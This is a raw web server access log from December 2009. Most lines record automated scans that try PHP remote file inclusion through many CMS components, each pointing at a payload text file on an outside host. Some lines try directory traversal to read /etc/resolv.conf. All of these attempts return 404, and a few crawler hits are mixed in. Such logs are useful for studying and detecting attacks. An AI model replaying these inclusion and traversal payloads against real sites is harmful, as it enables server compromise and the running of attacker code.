78.110.50.121 - - [15/Dec/2009:23:58:55 -0600] "GET /logs//setup.php?setup[use_category]=1&dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:23:59:12 -0600] "GET //setup.php?setup[use_category]=1&dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:23:59:12 -0600] "GET /logs//setup.php?setup[use_category]=1&dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:23:59:12 -0600] "GET /logs/access_log.1251417600//setup.php?setup[use_category]=1&dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:23:59:12 -0600] "GET /logs/access_log.1251331200//setup.php?setup[use_category]=1&dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.110.50.121 - - [15/Dec/2009:23:59:25 -0600] "GET /logs/access_log.1251331200//setup.php?setup[use_category]=1&dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.157.142.138 - - [15/Dec/2009:23:59:42 -0600] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
202.157.142.138 - - [15/Dec/2009:23:59:42 -0600] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
202.157.142.138 - - [15/Dec/2009:23:59:42 -0600] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
202.157.142.138 - - [15/Dec/2009:23:59:52 -0600] "GET /logs/access_log.1243468800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.106.133 - - [16/Dec/2009:00:00:37 -0600] "GET /logs/access_log.1245542400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.30.180.44 - - [16/Dec/2009:00:00:45 -0600] "GET /logs//tags.php?BBCodeFile=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 297 "-""-"
217.30.180.44 - - [16/Dec/2009:00:00:45 -0600] "GET //tags.php?BBCodeFile=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 292 "-""-"
209.92.156.53 - - [16/Dec/2009:00:01:22 -0600] "GET //include/bbs.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:00:01:22 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:00:01:22 -0600] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:00:01:22 -0600] "GET /logs/access_log.1242000000//include/bbs.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
94.23.238.192 - - [16/Dec/2009:00:01:43 -0600] "GET /logs/ HTTP/1.0" 200 216415 "http://fortpit.pconline.com/logs/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706)"
209.92.156.53 - - [16/Dec/2009:00:03:58 -0600] "GET /logs/access_log.1240272000//include/bbs.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.106.235 - - [16/Dec/2009:00:04:07 -0600] "GET /logs/access_log.1235692800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.19.51.194 - - [16/Dec/2009:00:04:15 -0600] "GET /logs//includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:00:04:15 -0600] "GET //includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:00:04:15 -0600] "GET /logs/access_log.1243987200//includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:00:04:50 -0600] "GET /logs/access_log.1240272000//include/bbs.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.226.134.29 - - [16/Dec/2009:00:04:59 -0600] "GET /logs/access_log.1240272000//components/com_extcalendar/errors.php?error=http://resultsphysio.com.au/Mambo/templates/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
200.226.134.29 - - [16/Dec/2009:00:04:59 -0600] "GET /logs/access_log.1240272000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://resultsphysio.com.au/Mambo/templates/id.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.803"
200.226.134.29 - - [16/Dec/2009:00:04:59 -0600] "GET //components/com_extcalendar/errors.php?error=http://resultsphysio.com.au/Mambo/templates/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
200.226.134.29 - - [16/Dec/2009:00:04:59 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://resultsphysio.com.au/Mambo/templates/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
200.226.134.29 - - [16/Dec/2009:00:05:00 -0600] "GET /logs//components/com_extcalendar/errors.php?error=http://resultsphysio.com.au/Mambo/templates/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
200.226.134.29 - - [16/Dec/2009:00:05:00 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://resultsphysio.com.au/Mambo/templates/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
67.19.51.194 - - [16/Dec/2009:00:06:13 -0600] "GET //includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:00:06:13 -0600] "GET /logs//includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:00:06:13 -0600] "GET /logs/access_log.1244592000//includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:00:06:13 -0600] "GET /logs/access_log.1244764800//includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.255.32.182 - - [16/Dec/2009:00:06:15 -0600] "GET //includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.255.32.182 - - [16/Dec/2009:00:06:15 -0600] "GET /logs//includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.255.32.182 - - [16/Dec/2009:00:06:15 -0600] "GET /logs/access_log.1244764800//includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.255.32.182 - - [16/Dec/2009:00:06:15 -0600] "GET /logs/access_log.1244592000//includes/db_adodb.php?baseDir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:00:07:06 -0600] "GET /logs/access_log.1244764800//includes/db_adodb.php?baseDir=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:00:07:06 -0600] "GET /logs/access_log.1244592000//includes/db_adodb.php?baseDir=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:00:07:06 -0600] "GET //includes/db_adodb.php?baseDir=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:00:07:06 -0600] "GET /logs//includes/db_adodb.php?baseDir=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:00:07:43 -0600] "GET //includes/db_adodb.php?baseDir=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:00:07:43 -0600] "GET /logs/access_log.1244592000//includes/db_adodb.php?baseDir=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:00:07:43 -0600] "GET /logs//includes/db_adodb.php?baseDir=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:00:07:43 -0600] "GET /logs/access_log.1244764800//includes/db_adodb.php?baseDir=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
81.174.65.34 - - [16/Dec/2009:00:09:13 -0600] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 331 "-""-"
81.174.65.34 - - [16/Dec/2009:00:09:14 -0600] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 326 "-""-"
81.174.65.34 - - [16/Dec/2009:00:09:14 -0600] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 331 "-""-"
81.174.65.34 - - [16/Dec/2009:00:09:14 -0600] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 326 "-""-"
218.5.74.92 - - [16/Dec/2009:00:09:34 -0600] "GET /logs/access_log.1255132800/index.php?pilih=http://www.sureweld.net///administrator/components/com_virtuemart/languages/store/i.txt?????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:00:09:34 -0600] "GET /logs/index.php?pilih=http://www.sureweld.net///administrator/components/com_virtuemart/languages/store/i.txt?????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:00:09:34 -0600] "GET /logs/access_log.1253923200/index.php?pilih=http://www.sureweld.net///administrator/components/com_virtuemart/languages/store/i.txt?????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:00:09:34 -0600] "GET /index.php?pilih=http://www.sureweld.net///administrator/components/com_virtuemart/languages/store/i.txt?????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
212.158.160.50 - - [16/Dec/2009:00:12:09 -0600] "GET /logs//admin/index.php?o=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 304 "-""-"
212.158.160.50 - - [16/Dec/2009:00:12:10 -0600] "GET //admin/index.php?o=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 299 "-""-"
122.201.76.100 - - [16/Dec/2009:00:12:31 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:12:31 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:12:31 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:12:39 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:12:39 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:12:39 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:00:13:45 -0600] "GET /logs/index.php?pilih=http://www.sureweld.net///administrator/components/com_virtuemart/languages/store/i.txt?????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:00:13:45 -0600] "GET /logs/access_log.1255132800/index.php?pilih=http://www.sureweld.net///administrator/components/com_virtuemart/languages/store/i.txt?????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:00:13:45 -0600] "GET /index.php?pilih=http://www.sureweld.net///administrator/components/com_virtuemart/languages/store/i.txt?????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:00:13:45 -0600] "GET /logs/access_log.1253923200/index.php?pilih=http://www.sureweld.net///administrator/components/com_virtuemart/languages/store/i.txt?????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:00:14:15 -0600] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:00:14:15 -0600] "GET /logs/access_log.1230681600/modules/My_eGallery/index.php?basepath=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:00:14:15 -0600] "GET /modules/My_eGallery/index.php?basepath=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:00:14:15 -0600] "GET /logs/access_log.1228521600/modules/My_eGallery/index.php?basepath=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.106.136 - - [16/Dec/2009:00:14:56 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.201.76.100 - - [16/Dec/2009:00:15:19 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:15:19 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:15:19 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:15:22 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:15:22 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:15:22 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
65.55.106.136 - - [16/Dec/2009:00:15:38 -0600] "GET /logs/access_log.1240272000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.201.76.100 - - [16/Dec/2009:00:17:09 -0600] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.201.76.100 - - [16/Dec/2009:00:17:11 -0600] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.133 - - [16/Dec/2009:00:17:38 -0600] "GET /logs/access_log.1147046400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.155 - - [16/Dec/2009:00:19:38 -0600] "GET /logs/access_log.1200182400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.157.142.138 - - [16/Dec/2009:00:20:23 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:00:20:23 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:00:20:23 -0600] "GET /logs/access_log.1255478400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:00:20:38 -0600] "GET /logs/access_log.1238889600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
74.53.183.210 - - [16/Dec/2009:00:21:28 -0600] "GET /logs/index.php?arquivo=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:00:21:28 -0600] "GET /index.php?arquivo=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 292 "-""-"
74.53.183.210 - - [16/Dec/2009:00:21:28 -0600] "GET /logs/index.php?arquivo=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:00:21:28 -0600] "GET /index.php?arquivo=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 292 "-""-"
82.98.136.21 - - [16/Dec/2009:00:22:38 -0600] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:00:22:44 -0600] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:00:22:45 -0600] "GET /logs/access_log.1237075200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.195.112.125 - - [16/Dec/2009:00:23:18 -0600] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.125 - - [16/Dec/2009:00:23:18 -0600] "GET /logs/access_log.1198886400 HTTP/1.0" 200 1393 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.98.139.21 - - [16/Dec/2009:00:23:30 -0600] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:23:30 -0600] "GET /logs/access_log.1237075200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:23:30 -0600] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:23:31 -0600] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:23:31 -0600] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:23:31 -0600] "GET /logs/access_log.1237075200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.228.240.75 - - [16/Dec/2009:00:23:55 -0600] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 330 "-""-"
207.228.240.75 - - [16/Dec/2009:00:23:55 -0600] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 330 "-""-"
122.201.81.160 - - [16/Dec/2009:00:24:18 -0600] "GET /logs/access_log.1228608000/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 356 "-""-"
74.86.82.218 - - [16/Dec/2009:00:24:30 -0600] "GET /apps/apps.php?app=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 296 "-""-"
82.98.136.21 - - [16/Dec/2009:00:28:25 -0600] "GET /logs/access_log.1240272000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:29:23 -0600] "GET /logs/access_log.1240272000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:29:31 -0600] "GET /logs/access_log.1240272000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:00:30:41 -0600] "GET /logs/access_log.1236211200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:00:30:48 -0600] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:00:30:48 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:00:30:48 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:00:31:10 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:00:31:10 -0600] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:00:31:10 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:00:31:13 -0600] "GET /logs/access_log.1249344000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:00:31:21 -0600] "GET /logs/access_log.1249344000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:33:18 -0600] "GET /logs/access_log.1235433600//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:00:33:24 -0600] "GET /logs/access_log.1235433600//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:33:26 -0600] "GET /logs/access_log.1235433600//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:34:35 -0600] "GET /logs/access_log.1240272000//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:00:34:37 -0600] "GET /logs/access_log.1240272000//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:00:34:51 -0600] "GET /logs/access_log.1249776000//skin/happycast_category_lightblack/setup.php?dir=http://sowa.com.mx/site/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:00:34:55 -0600] "GET /logs/access_log.1240272000//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
122.201.81.160 - - [16/Dec/2009:00:35:19 -0600] "GET /logs/includes/lang/language.php?path_to_root=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 314 "-""-"
122.201.81.160 - - [16/Dec/2009:00:35:19 -0600] "GET /includes/lang/language.php?path_to_root=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 309 "-""-"
122.201.81.160 - - [16/Dec/2009:00:35:20 -0600] "GET /logs/includes/lang/language.php?path_to_root=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 314 "-""-"
122.201.81.160 - - [16/Dec/2009:00:35:20 -0600] "GET /includes/lang/language.php?path_to_root=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 309 "-""-"
70.38.31.183 - - [16/Dec/2009:00:36:11 -0600] "GET /logs/access_log.1249776000//skin/happycast_category_lightblack/setup.php?dir=http://sowa.com.mx/site/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
